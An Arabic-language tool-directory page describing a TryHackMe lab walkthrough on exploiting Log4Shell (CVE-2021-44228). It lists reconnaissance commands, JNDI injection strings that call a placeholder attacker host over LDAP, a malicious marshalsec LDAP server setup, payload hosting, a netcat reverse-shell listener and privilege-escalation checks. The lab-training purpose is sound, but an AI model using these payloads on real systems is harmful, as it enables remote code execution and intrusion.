Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
solar-exploiting-log4j — يقدم هذا المستودع دليلاً مفصلاً لغرفة *Solar Exploiting Log4j* على TryHackMe، مع التركيز على استغلال الثغرة الأمنية الحرجة Log4Shell (CVE-2021-44228). يوضح المشروع كيف يمكن للمهاجمين استغلال آليات التسجيل غير الآمنة في تطبيقات Java لتحقيق تنفيذ التعليمات البرمجية عن بعد. | Kitploit
أدوات/GitHubGitHub/lavanya2085/solar-exploiting-log4j
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHublavanya2085/solar-exploiting-log4j

solar-exploiting-log4j

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

يقدم هذا المستودع دليلاً مفصلاً لغرفة *Solar Exploiting Log4j* على TryHackMe، مع التركيز على استغلال الثغرة الأمنية الحرجة Log4Shell (CVE-2021-44228). يوضح المشروع كيف يمكن للمهاجمين استغلال آليات التسجيل غير الآمنة في تطبيقات Java لتحقيق تنفيذ التعليمات البرمجية عن بعد.

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

🔥 Solar استغلال Log4j - دليل TryHackMe

📌 الغرفة: Solar Exploiting Log4j

المنصة: TryHackMe الصعوبة: متوسط الموضوع: Log4Shell (ثغرة Log4j)


🧠 الهدف

استغلال ثغرة Log4j (CVE-2021-44228) للحصول على تنفيذ الأوامر عن بُعد والتقاط الأعلام.


🛠️ الأدوات المستخدمة

  • Nmap
  • Burp Suite
  • cURL
  • Netcat
  • Python HTTP Server

🌐 الخطوة 1: الاستطلاع

🔍 مسح الهدف

root@kitploit:~
nmap -sC -sV <TARGET_IP>

📌 النتائج

  • المنافذ المفتوحة: 80 (HTTP)، وغيرها حسب الغرفة
  • تطبيق ويب يعمل بنظام خلفي مبني على Java

🌐 الخطوة 2: تعداد الويب

  • زيارة تطبيق الويب في المتصفح
  • التفاعل مع حقول الإدخال (تسجيل الدخول/البحث/رؤوس HTTP)
  • التقاط الطلب باستخدام Burp Suite

💥 الخطوة 3: تحديد ثغرة Log4j

ثغرة Log4j تسمح بحقن JNDI:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/a}

إذا تم تسجيل الإدخال → فالثغرة موجودة.


⚙️ الخطوة 4: إعداد المستمع

تشغيل Netcat

root@kitploit:~
nc -lvnp 4444

تشغيل خادم LDAP ضار (مثال)

root@kitploit:~
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package

تشغيل خادم LDAP:

root@kitploit:~
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389

📡 الخطوة 5: استضافة الحمولة

root@kitploit:~
python3 -m http.server 8000

إنشاء كلاس Java ضار (Exploit.class)


🚀 الخطوة 6: تشغيل الاستغلال

حقن الحمولة في الحقل المعرض للخطر:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}

💡 استخدم رؤوس مثل:

  • User-Agent
  • X-Api-Version

🖥️ الخطوة 7: الحصول على شل عكسي

بمجرد التشغيل:

  • الهدف يتصل مرة أخرى بمستمع Netcat
  • تحصل على وصول شل

🔐 الخطوة 8: تصعيد الصلاحيات (إذا لزم الأمر)

تحقق:

root@kitploit:~
sudo -l

ابحث عن:

  • ثنائيات SUID تم تكوينها بشكل خاطئ
  • ملفات قابلة للكتابة
  • وظائف Cron

🚩 الخطوة 9: التقاط الأعلام

root@kitploit:~
find / -name flag.txt 2>/dev/null
cat flag.txt

🧾 المفاهيم الأساسية المستفادة

  • Log4Shell (CVE-2021-44228)
  • حقن JNDI
  • تنفيذ الأوامر عن بُعد (RCE)
  • الشل العكسي
  • استغلال الويب

تنزيل الأداة